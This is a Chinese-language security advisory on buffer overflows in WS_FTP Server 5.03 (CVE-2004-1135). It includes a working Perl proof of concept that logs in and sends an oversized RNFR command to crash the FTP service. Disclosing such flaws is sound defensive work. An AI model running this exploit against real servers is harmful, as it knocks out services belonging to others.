WS_FTP Server多个命令处理缓冲区溢出漏洞
发布日期:2004-11-29
更新日期:2004-11-30
受影响系统:Ipswitch WS FTP Server 5.03
描述:
BUGTRAQ ID:
11772
CVE ID:
CVE-2004-1135
WS_FTP Server是一款FTP服务程序。
WS_FTP Server多个命令处理存在缓冲区溢出问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
程序对SITE、XMKD、MKD和RNFR命令参数的处理缺少正确的缓冲区边界检查,精心构建提交参数可能以进程权限在系统上执行任意指令。
<*来源:Reed Arvin (
reedarvin@gmail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=110177654524819&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Reed Arvin (
reedarvin@gmail.com)提供了如下测试方法:
#===== Start WS_FTP_Overflow.pl =====
#
# Usage: WS_FTP_Overflow.pl <ip> <ftp user> <ftp pass>
# WS_FTP_Overflow.pl 127.0.0.1 hello moto
#
# WS_FTP Server Version 5.03, 2004.10.14
#
# Download:
#
http://www.ipswitch.com/
#
#####################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Attempting to kill WS_FTP Server service at $ARGV[0]:21...";
sleep(1);
print $socket "USER $ARGV[1]\r\n";
sleep(1);
print $socket "PASS $ARGV[2]\r\n";
sleep(1);
print $socket "PORT 127,0,0,1,18,12\r\n";
sleep(1);
print $socket "RNFR " . "A" x 768 . "\r\n";
close($socket);
sleep(1);
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
close($socket);
print "failed!\n";
}
else
{
print "successful!\n";
}
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
#===== End WS_FTP_Overflow.pl =====
建议:
厂商补丁:
Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ipswitch.com/浏览次数:4585
严重程度:0(网友投票)